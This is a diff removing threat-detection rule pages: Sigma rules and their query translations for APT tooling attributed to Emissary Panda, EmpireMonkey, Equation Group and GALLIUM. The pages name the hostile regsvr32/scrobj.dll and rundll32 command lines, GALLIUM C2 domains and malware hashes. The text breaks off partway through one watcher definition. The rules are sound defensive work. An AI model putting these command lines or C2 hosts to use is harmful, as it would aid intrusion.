-| Title                    | Emissary Panda Malware SLLauncher       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965](https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965)</li><li>[https://twitter.com/cyb3rops/status/1168863899531132929](https://twitter.com/cyb3rops/status/1168863899531132929)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Emissary Panda Malware SLLauncher
-id: 9aa01d62-7667-4d3b-acb8-8cb5103e2014
-status: experimental
-description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
-references:
-    - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965
-    - https://twitter.com/cyb3rops/status/1168863899531132929
-author: Florian Roth
-date: 2018/09/03
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\sllauncher.exe'
-        Image: '*\svchost.exe'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\sllauncher.exe" -and $_.message -match "Image.*.*\\svchost.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\sllauncher.exe AND winlog.event_data.Image.keyword:*\\svchost.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9aa01d62-7667-4d3b-acb8-8cb5103e2014 <<EOF
-{
-  "metadata": {
-    "title": "Emissary Panda Malware SLLauncher",
-    "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27",
-    "tags": "",
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\sllauncher.exe AND winlog.event_data.Image.keyword:*\\\\svchost.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\sllauncher.exe AND winlog.event_data.Image.keyword:*\\\\svchost.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Emissary Panda Malware SLLauncher'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\sllauncher.exe AND Image.keyword:*\\svchost.exe)
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\sllauncher.exe" Image="*\\svchost.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\sllauncher.exe" Image="*\\svchost.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\sllauncher\.exe)(?=.*.*\svchost\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_empiremonkey.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_empiremonkey.md
deleted file mode 100644
index 475082a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_empiremonkey.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Empire Monkey       |
-|:-------------------------|:------------------|
-| **Description**          | Detects EmpireMonkey APT reported Activity |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Very Unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b](https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b)</li></ul>  |
-| **Author**               | Markus Neis |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Empire Monkey
-id: 10152a7b-b566-438f-a33c-390b607d1c8d
-description: Detects EmpireMonkey APT reported Activity
-references:
-    - https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b
-tags:
-    - attack.t1086
-    - attack.execution
-date: 2019/04/02
-author: Markus Neis
-detection:
-    condition: 1 of them
-falsepositives:
-    - Very Unlikely 
-level: critical
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_cutil:
-        CommandLine: 
-            - '*/i:%APPDATA%\logs.txt scrobj.dll'
-        Image:
-            - '*\cutil.exe'
-    selection_regsvr32:
-        CommandLine: 
-            - '*/i:%APPDATA%\logs.txt scrobj.dll'
-        Description: 
-            - Microsoft(C) Registerserver
-        
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*/i:%APPDATA%\\logs.txt scrobj.dll") -and (($_.message -match "Image.*.*\\cutil.exe") -or ($_.message -match "Microsoft(C) Registerserver"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:(*\/i\:%APPDATA%\\logs.txt\ scrobj.dll) AND (winlog.event_data.Image.keyword:(*\\cutil.exe) OR winlog.event_data.Description:("Microsoft\(C\)\ Registerserver")))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/10152a7b-b566-438f-a33c-390b607d1c8d <<EOF
-{
-  "metadata": {
-    "title": "Empire Monkey",
-    "description": "Detects EmpireMonkey APT reported Activity",
-    "tags": [
-      "attack.t1086",
-      "attack.execution"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:(*\\/i\\:%APPDATA%\\\\logs.txt\\ scrobj.dll) AND (winlog.event_data.Image.keyword:(*\\\\cutil.exe) OR winlog.event_data.Description:(\"Microsoft\\(C\\)\\ Registerserver\")))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:(*\\/i\\:%APPDATA%\\\\logs.txt\\ scrobj.dll) AND (winlog.event_data.Image.keyword:(*\\\\cutil.exe) OR winlog.event_data.Description:(\"Microsoft\\(C\\)\\ Registerserver\")))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Empire Monkey'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:(*\/i\:%APPDATA%\\logs.txt scrobj.dll) AND (Image.keyword:(*\\cutil.exe) OR Description:("Microsoft\(C\) Registerserver")))
-```
-
-
-### splunk
-    
-```
-((CommandLine="*/i:%APPDATA%\\logs.txt scrobj.dll") ((Image="*\\cutil.exe") OR (Description="Microsoft(C) Registerserver")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*/i:%APPDATA%\\logs.txt scrobj.dll"] (Image IN ["*\\cutil.exe"] OR Description IN ["Microsoft(C) Registerserver"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*/i:%APPDATA%\logs\.txt scrobj\.dll))(?=.*(?:.*(?:.*(?:.*.*\cutil\.exe)|.*(?:.*Microsoft\(C\) Registerserver)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_equationgroup_dll_u_load.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_equationgroup_dll_u_load.md
deleted file mode 100644
index 234cfd3..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_equationgroup_dll_u_load.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Equation Group DLL_U Load       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a specific tool and export used by EquationGroup |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1085: Rundll32](https://attack.mitre.org/techniques/T1085)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=](https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=)</li><li>[https://securelist.com/apt-slingshot/84312/](https://securelist.com/apt-slingshot/84312/)</li><li>[https://twitter.com/cyb3rops/status/972186477512839170](https://twitter.com/cyb3rops/status/972186477512839170)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0020</li><li>attack.t1218.011</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Equation Group DLL_U Load
-id: d465d1d8-27a2-4cca-9621-a800f37cf72e
-author: Florian Roth
-date: 2019/03/04
-description: Detects a specific tool and export used by EquationGroup
-references:
-    - https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=
-    - https://securelist.com/apt-slingshot/84312/
-    - https://twitter.com/cyb3rops/status/972186477512839170
-tags:
-    - attack.execution
-    - attack.g0020
-    - attack.t1059
-    - attack.defense_evasion
-    - attack.t1085
-    - attack.t1218.011
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Image: '*\rundll32.exe'
-        CommandLine: '*,dll_u'
-    selection2:
-        CommandLine: '* -export dll_u *'
-    condition: 1 of them
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\rundll32.exe" -and $_.message -match "CommandLine.*.*,dll_u") -or $_.message -match "CommandLine.*.* -export dll_u .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\rundll32.exe AND winlog.event_data.CommandLine.keyword:*,dll_u) OR winlog.event_data.CommandLine.keyword:*\ \-export\ dll_u\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d465d1d8-27a2-4cca-9621-a800f37cf72e <<EOF
-{
-  "metadata": {
-    "title": "Equation Group DLL_U Load",
-    "description": "Detects a specific tool and export used by EquationGroup",
-    "tags": [
-      "attack.execution",
-      "attack.g0020",
-      "attack.t1059",
-      "attack.defense_evasion",
-      "attack.t1085",
-      "attack.t1218.011"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\rundll32.exe AND winlog.event_data.CommandLine.keyword:*,dll_u) OR winlog.event_data.CommandLine.keyword:*\\ \\-export\\ dll_u\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\rundll32.exe AND winlog.event_data.CommandLine.keyword:*,dll_u) OR winlog.event_data.CommandLine.keyword:*\\ \\-export\\ dll_u\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Equation Group DLL_U Load'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\rundll32.exe AND CommandLine.keyword:*,dll_u) OR CommandLine.keyword:* \-export dll_u *)
-```
-
-
-### splunk
-    
-```
-((Image="*\\rundll32.exe" CommandLine="*,dll_u") OR CommandLine="* -export dll_u *")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image="*\\rundll32.exe" CommandLine="*,dll_u") OR CommandLine="* -export dll_u *"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\rundll32\.exe)(?=.*.*,dll_u))|.*.* -export dll_u .*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_gallium.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_gallium.md
deleted file mode 100644
index 7a8f0fa..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_gallium.md
+++ /dev/null
@@ -1,385 +0,0 @@
-| Title                    | GALLIUM Artefacts       |
-|:-------------------------|:------------------|
-| **Description**          | Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/](https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/)</li><li>[https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11))</li></ul>  |
-| **Author**               | Tim Burrell |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: GALLIUM Artefacts
-id: 440a56bf-7873-4439-940a-1c8a671073c2
-status: experimental
-description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
-author: Tim Burrell
-date: 2020/02/07
-references:
-    - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/
-    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
-tags:
-    - attack.credential_access
-    - attack.command_and_control
-falsepositives:
-    - unknown
-level: high
----
-logsource:
-    product: windows
-    category: process_creation
-detection:
-    exec_selection:
-        sha1:
-            - '53a44c2396d15c3a03723fa5e5db54cafd527635'
-            - '9c5e496921e3bc882dc40694f1dcc3746a75db19'
-            - 'aeb573accfd95758550cf30bf04f389a92922844'
-            - '79ef78a797403a4ed1a616c68e07fff868a8650a'
-            - '4f6f38b4cec35e895d91c052b1f5a83d665c2196'
-            - '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d'
-            - 'e841a63e47361a572db9a7334af459ddca11347a'
-            - 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d'
-            - '2e94b305d6812a9f96e6781c888e48c7fb157b6b'
-            - 'dd44133716b8a241957b912fa6a02efde3ce3025'
-            - '8793bf166cb89eb55f0593404e4e933ab605e803'
-            - 'a39b57032dbb2335499a51e13470a7cd5d86b138'
-            - '41cc2b15c662bc001c0eb92f6cc222934f0beeea'
-            - 'd209430d6af54792371174e70e27dd11d3def7a7'
-            - '1c6452026c56efd2c94cea7e0f671eb55515edb0'
-            - 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a'
-            - '4923d460e22fbbf165bbbaba168e5a46b8157d9f'
-            - 'f201504bd96e81d0d350c3a8332593ee1c9e09de'
-            - 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2'
-    condition: exec_selection
----
-logsource:
-    product: windows
-    service: dns-server
-detection:
-    c2_selection:
-        EventID: 257
-        QNAME: 
-            - 'asyspy256.ddns.net'
-            - 'hotkillmail9sddcc.ddns.net'
-            - 'rosaf112.ddns.net'
-            - 'cvdfhjh1231.myftp.biz'
-            - 'sz2016rose.ddns.net'
-            - 'dffwescwer4325.myftp.biz'
-            - 'cvdfhjh1231.ddns.net'
-    condition: c2_selection
----
-logsource:
-    product: windows
-    category: process_creation
-detection:
-    legitimate_process_path:
-        Image|contains:
-            - ':\Program Files(x86)\'
-            - ':\Program Files\'
-    legitimate_executable:
-        sha1:
-            - 'e570585edc69f9074cb5e8a790708336bd45ca0f'
-    condition: legitimate_executable and not legitimate_process_path
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "53a44c2396d15c3a03723fa5e5db54cafd527635" -or $_.message -match "9c5e496921e3bc882dc40694f1dcc3746a75db19" -or $_.message -match "aeb573accfd95758550cf30bf04f389a92922844" -or $_.message -match "79ef78a797403a4ed1a616c68e07fff868a8650a" -or $_.message -match "4f6f38b4cec35e895d91c052b1f5a83d665c2196" -or $_.message -match "1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d" -or $_.message -match "e841a63e47361a572db9a7334af459ddca11347a" -or $_.message -match "c28f606df28a9bc8df75a4d5e5837fc5522dd34d" -or $_.message -match "2e94b305d6812a9f96e6781c888e48c7fb157b6b" -or $_.message -match "dd44133716b8a241957b912fa6a02efde3ce3025" -or $_.message -match "8793bf166cb89eb55f0593404e4e933ab605e803" -or $_.message -match "a39b57032dbb2335499a51e13470a7cd5d86b138" -or $_.message -match "41cc2b15c662bc001c0eb92f6cc222934f0beeea" -or $_.message -match "d209430d6af54792371174e70e27dd11d3def7a7" -or $_.message -match "1c6452026c56efd2c94cea7e0f671eb55515edb0" -or $_.message -match "c6b41d3afdcdcaf9f442bbe772f5da871801fd5a" -or $_.message -match "4923d460e22fbbf165bbbaba168e5a46b8157d9f" -or $_.message -match "f201504bd96e81d0d350c3a8332593ee1c9e09de" -or $_.message -match "ddd2db1127632a2a52943a2fe516a2e7d05d70d2")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "257" -and ($_.message -match "asyspy256.ddns.net" -or $_.message -match "hotkillmail9sddcc.ddns.net" -or $_.message -match "rosaf112.ddns.net" -or $_.message -match "cvdfhjh1231.myftp.biz" -or $_.message -match "sz2016rose.ddns.net" -or $_.message -match "dffwescwer4325.myftp.biz" -or $_.message -match "cvdfhjh1231.ddns.net")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "e570585edc69f9074cb5e8a790708336bd45ca0f") -and  -not (($_.message -match "Image.*.*:\\Program Files(x86)\\.*" -or $_.message -match "Image.*.*:\\Program Files\\.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-sha1:("53a44c2396d15c3a03723fa5e5db54cafd527635" OR "9c5e496921e3bc882dc40694f1dcc3746a75db19" OR "aeb573accfd95758550cf30bf04f389a92922844" OR "79ef78a797403a4ed1a616c68e07fff868a8650a" OR "4f6f38b4cec35e895d91c052b1f5a83d665c2196" OR "1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d" OR "e841a63e47361a572db9a7334af459ddca11347a" OR "c28f606df28a9bc8df75a4d5e5837fc5522dd34d" OR "2e94b305d6812a9f96e6781c888e48c7fb157b6b" OR "dd44133716b8a241957b912fa6a02efde3ce3025" OR "8793bf166cb89eb55f0593404e4e933ab605e803" OR "a39b57032dbb2335499a51e13470a7cd5d86b138" OR "41cc2b15c662bc001c0eb92f6cc222934f0beeea" OR "d209430d6af54792371174e70e27dd11d3def7a7" OR "1c6452026c56efd2c94cea7e0f671eb55515edb0" OR "c6b41d3afdcdcaf9f442bbe772f5da871801fd5a" OR "4923d460e22fbbf165bbbaba168e5a46b8157d9f" OR "f201504bd96e81d0d350c3a8332593ee1c9e09de" OR "ddd2db1127632a2a52943a2fe516a2e7d05d70d2")
-(winlog.channel:"DNS\ Server" AND winlog.event_id:"257" AND QNAME:("asyspy256.ddns.net" OR "hotkillmail9sddcc.ddns.net" OR "rosaf112.ddns.net" OR "cvdfhjh1231.myftp.biz" OR "sz2016rose.ddns.net" OR "dffwescwer4325.myftp.biz" OR "cvdfhjh1231.ddns.net"))
-(sha1:("e570585edc69f9074cb5e8a790708336bd45ca0f") AND (NOT (winlog.event_data.Image.keyword:(*\:\\Program\ Files\(x86\)\\* OR *\:\\Program\ Files\\*))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/440a56bf-7873-4439-940a-1c8a671073c2 <<EOF
-{
-  "metadata": {
-    "title": "GALLIUM Artefacts",
-    "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.",
-    "tags": [
-      "attack.credential_access",
-      "attack.command_and_control"
-    ],
-    "query": "sha1:(\"53a44c2396d15c3a03723fa5e5db54cafd527635\" OR \"9c5e496921e3bc882dc40694f1dcc3746a75db19\" OR \"aeb573accfd95758550cf30bf04f389a92922844\" OR \"79ef78a797403a4ed1a616c68e07fff868a8650a\" OR \"4f6f38b4cec35e895d91c052b1f5a83d665c2196\" OR \"1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d\" OR \"e841a63e47361a572db9a7334af459ddca11347a\" OR \"c28f606df28a9bc8df75a4d5e5837fc5522dd34d\" OR \"2e94b305d6812a9f96e6781c888e48c7fb157b6b\" OR \"dd44133716b8a241957b912fa6a02efde3ce3025\" OR \"8793bf166cb89eb55f0593404e4e933ab605e803\" OR \"a39b57032dbb2335499a51e13470a7cd5d86b138\" OR \"41cc2b15c662bc001c0eb92f6cc222934f0beeea\" OR \"d209430d6af54792371174e70e27dd11d3def7a7\" OR \"1c6452026c56efd2c94cea7e0f671eb55515edb0\" OR \"c6b41d3afdcdcaf9f442bbe772f5da871801fd5a\" OR \"4923d460e22fbbf165bbbaba168e5a46b8157d9f\" OR \"f201504bd96e81d0d350c3a8332593ee1c9e09de\" OR \"ddd2db1127632a2a52943a2fe516a2e7d05d70d2\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "sha1:(\"53a44c2396d15c3a03723fa5e5db54cafd527635\" OR \"9c5e496921e3bc882dc40694f1dcc3746a75db19\" OR \"aeb573accfd95758550cf30bf04f389a92922844\" OR \"79ef78a797403a4ed1a616c68e07fff868a8650a\" OR \"4f6f38b4cec35e895d91c052b1f5a83d665c2196\" OR \"1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d\" OR \"e841a63e47361a572db9a7334af459ddca11347a\" OR \"c28f606df28a9bc8df75a4d5e5837fc5522dd34d\" OR \"2e94b305d6812a9f96e6781c888e48c7fb157b6b\" OR \"dd44133716b8a241957b912fa6a02efde3ce3025\" OR \"8793bf166cb89eb55f0593404e4e933ab605e803\" OR \"a39b57032dbb2335499a51e13470a7cd5d86b138\" OR \"41cc2b15c662bc001c0eb92f6cc222934f0beeea\" OR \"d209430d6af54792371174e70e27dd11d3def7a7\" OR \"1c6452026c56efd2c94cea7e0f671eb55515edb0\" OR \"c6b41d3afdcdcaf9f442bbe772f5da871801fd5a\" OR \"4923d460e22fbbf165bbbaba168e5a46b8157d9f\" OR \"f201504bd96e81d0d350c3a8332593ee1c9e09de\" OR \"ddd2db1127632a2a52943a2fe516a2e7d05d70d2\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'GALLIUM Artefacts'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/440a56bf-7873-4439-940a-1c8a671073c2-2 <<EOF
-{
-  "metadata": {
-    "title": "GALLIUM Artefacts",
-    "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.",
-    "tags": [
-      "attack.credential_access",
-      "attack.command_and_control"
-    ],
-    "query": "(winlog.channel:\"DNS\\ Server\" AND winlog.event_id:\"257\" AND QNAME:(\"asyspy256.ddns.net\" OR \"hotkillmail9sddcc.ddns.net\" OR \"rosaf112.ddns.net\" OR \"cvdfhjh1231.myftp.biz\" OR \"sz2016rose.ddns.net\" OR \"dffwescwer4325.myftp.biz\" OR \"cvdfhjh1231.ddns.net\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"DNS\\ Server\" AND winlog.event_id:\"257\" AND QNAME:(\"asyspy256.ddns.net\" OR \"hotkillmail9sddcc.ddns.net\" OR \"rosaf112.ddns.net\" OR \"cvdfhjh1231.myftp.biz\" OR \"sz2016rose.ddns.net\" OR \"dffwescwer4325.myftp.biz\" OR \"cvdfhjh1231.ddns.net\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
